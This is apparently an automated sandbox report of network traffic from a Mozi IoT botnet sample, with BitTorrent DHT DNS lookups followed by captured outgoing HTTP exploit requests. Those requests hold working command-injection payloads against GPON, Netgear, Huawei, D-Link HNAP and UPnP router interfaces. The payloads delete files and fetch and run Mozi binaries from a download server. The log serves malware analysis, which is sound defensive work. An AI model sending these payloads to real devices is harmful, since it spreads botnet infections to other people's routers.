                                                                        Dec 6, 2024 00:39:00.269115925 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:00.269177914 CET192.168.2.231.1.1.10x1c47Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:05.518387079 CET192.168.2.238.8.8.80x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:05.518465996 CET192.168.2.231.1.1.10x1c47Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:05.518580914 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:10.767750025 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:10.767750978 CET192.168.2.231.1.1.10x1c47Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:10.767757893 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:16.017047882 CET192.168.2.238.8.8.80x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:16.017160892 CET192.168.2.231.1.1.10x1c47Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:16.017198086 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:21.266089916 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:21.266113043 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:21.266134024 CET192.168.2.231.1.1.10x1c47Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:26.515593052 CET192.168.2.238.8.8.80x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:26.515758991 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:31.764790058 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:31.764844894 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:37.013906956 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:37.013998985 CET192.168.2.238.8.8.80x2dd0Standard query (0)router.utorrent.comA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:42.263238907 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:47.512485027 CET192.168.2.231.1.1.10x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:39:52.761993885 CET192.168.2.238.8.8.80x2d66Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Dec 6, 2024 00:37:22.538012028 CET1.1.1.1192.168.2.230xe64cNo error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)false
                                                                        Dec 6, 2024 00:37:22.538012028 CET1.1.1.1192.168.2.230xe64cNo error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)false
                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        0192.168.2.2356874118.175.124.2580
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578052044 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 118.175.124.25:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        1192.168.2.235971639.116.5.1358080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578135967 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        2192.168.2.2338788169.40.164.18180
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578170061 CET281OUTGET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                                                                        User-Agent: Hello, world
                                                                        Host: 169.40.164.181:80
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                                        Connection: keep-alive


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        3192.168.2.235309643.79.133.1180
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578198910 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        4192.168.2.233403086.51.139.1997574
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578238010 CET811OUTPOST /UD/act?1 HTTP/1.1
                                                                        Host: 127.0.0.1:7574
                                                                        User-Agent: Hello, world
                                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                                        Content-Type: text/xml
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        5192.168.2.2336824117.116.60.18649152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578298092 CET932OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 117.116.60.186:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        6192.168.2.233469478.28.5.081
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578309059 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        7192.168.2.2341790169.253.87.24280
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578332901 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        8192.168.2.235424615.46.198.678443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578360081 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        9192.168.2.235311095.133.117.2138443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578392029 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        10192.168.2.235081420.138.27.15980
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578397036 CET185OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        11192.168.2.2360360144.192.196.18149152
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578453064 CET933OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                        Host: 144.192.196.181:49152
                                                                        Content-Length: 630
                                                                        Accept-Encoding: gzip, deflate
                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Connection: keep-alive
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        12192.168.2.23604623.143.102.18881
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578476906 CET170OUTGET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        13192.168.2.2351946160.64.200.25080
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578515053 CET328OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                        Host: 127.0.0.1:80
                                                                        Connection: keep-alive
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept: */*
                                                                        User-Agent: Hello, World
                                                                        Content-Length: 118
                                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        14192.168.2.235082679.205.134.17780
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578541040 CET803OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 79.205.134.177:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        15192.168.2.23515866.134.94.2438443
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578568935 CET138OUTGET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                                                                        Data Raw:
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        16192.168.2.23484721.85.100.9880
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578598976 CET800OUTPOST /HNAP1/ HTTP/1.0
                                                                        Host: 1.85.100.98:80
                                                                        Content-Type: text/xml; charset="utf-8"
                                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                        Content-Length: 640
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        17192.168.2.2337286201.239.180.4937215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578634977 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 201.239.180.49:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 [TRUNCATED]
                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                        18192.168.2.2349442129.224.247.2037215
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 6, 2024 00:36:55.578665972 CET822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                        Host: 129.224.247.20:37215
                                                                        Content-Length: 601
                                                                        Connection: keep-alive
                                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
